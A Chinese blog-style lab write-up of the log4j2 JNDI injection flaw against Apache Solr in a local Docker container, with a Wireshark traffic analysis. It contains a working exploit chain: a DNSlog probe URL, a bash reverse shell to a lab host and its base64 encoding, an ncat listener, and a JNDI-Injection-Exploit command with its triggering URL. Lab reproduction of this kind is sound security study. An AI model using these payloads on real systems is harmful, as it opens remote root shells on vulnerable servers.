当前位置: 首页 > news >正文

复现log4j2的jndi注入成功反弹shell

在Apache Solr 中复现log4j2的jndi注入漏洞,获得docker容器的root权限,实验五步走:

  1. 启动容器
  2. 访问web页面
  3. 漏洞探测
  4. 反弹shell载荷
  5. wireshark抓取log4j反弹shell流量

ailx10

1956 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

一、启动容器

二、访问web页面

IP地址192.168.0.105是我的ubuntu18.04虚拟机,这里作为靶机

三、漏洞探测

IP地址192.168.0.105是我的ubuntu18.04虚拟机,这里作为靶机

http://192.168.0.105:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ueg2ky.dnslog.cn} 

四、反弹shell载荷

IP地址192.168.0.104 是我的mac电脑

bash -i >& /dev/tcp/192.168.0.104/6666 0>&1

对上面的命令进行bash64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQ==

先在mac上进行监听

ncat -l 6666

在mac上运行漏洞利用命令[1]

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.104

用上面的命令结果访问靶机

http://192.168.0.105:8983/solr/admin/cores?action=${jndi:ldap://192.168.0.104:1389/9gozs8}

在mac上成功接收到靶机反弹的shell

五、wireshark抓取log4j反弹shell流量

我们可以清楚的看到攻击者访问了靶机有漏洞的页面

紧接着看到靶机主动访问了攻击者的IP地址,攻击者给靶机响应了200 OK状态码

反弹shell后,我们敲击一个ls,获得流量如下,都是TCP连接

请求流量

响应流量

参考

  1. ^JNDI-Injection-Exploit Releases · welk1n/JNDI-Injection-Exploit · GitHub

相关文章:

  • SQL进阶技巧:如何统计用户跨端消费行为?
  • (leetcode 1749 前缀和)1749. 任意子数组和的绝对值的最大值
  • 【嵌入式Linux应用开发基础】进程实战开发
  • 华为固态电池引发的思索
  • 2.18寒假
  • 06:高级命令
  • DeepSeek驱动下的数据仓库范式转移:技术解耦、认知重构与治理演进
  • 解析JUC包底层源码实现
  • 3.5 使用Tokenizer编解码文本:从原理到企业级实践
  • ArcGIS笔记之度分秒与十进制度的转换
  • 【分治法】棋盘覆盖问题 C/C++(附代码和测试实例及算法分析)
  • C语言——字符串
  • Udp发送和接收数据(python和QT)
  • 2025-02-18 学习记录--C/C++-PTA 7-25 念数字
  • 鱼骨图技能详解
  • macos安装jmeter测试软件
  • PHP语法入门完全指南(2024新版)
  • 【Spring】Spring配置文件
  • MapReduce远程调试
  • 如何利用快捷指令制作快递取件码提醒?
  • 中国天主教组织发贺电对新教皇当选表示祝贺
  • 习近平同瑞典国王卡尔十六世·古斯塔夫就中瑞建交75周年互致贺电
  • 西南大学教授、重庆健美运动奠基人之一李启圣逝世
  • 国家主席习近平同普京总统举行大范围会谈
  • 上海如何为街镇营商环境赋能?送政策、配资源、解难题、强活力
  • 驱逐行动再加码?特朗普或向利比亚和卢旺达遣送非法移民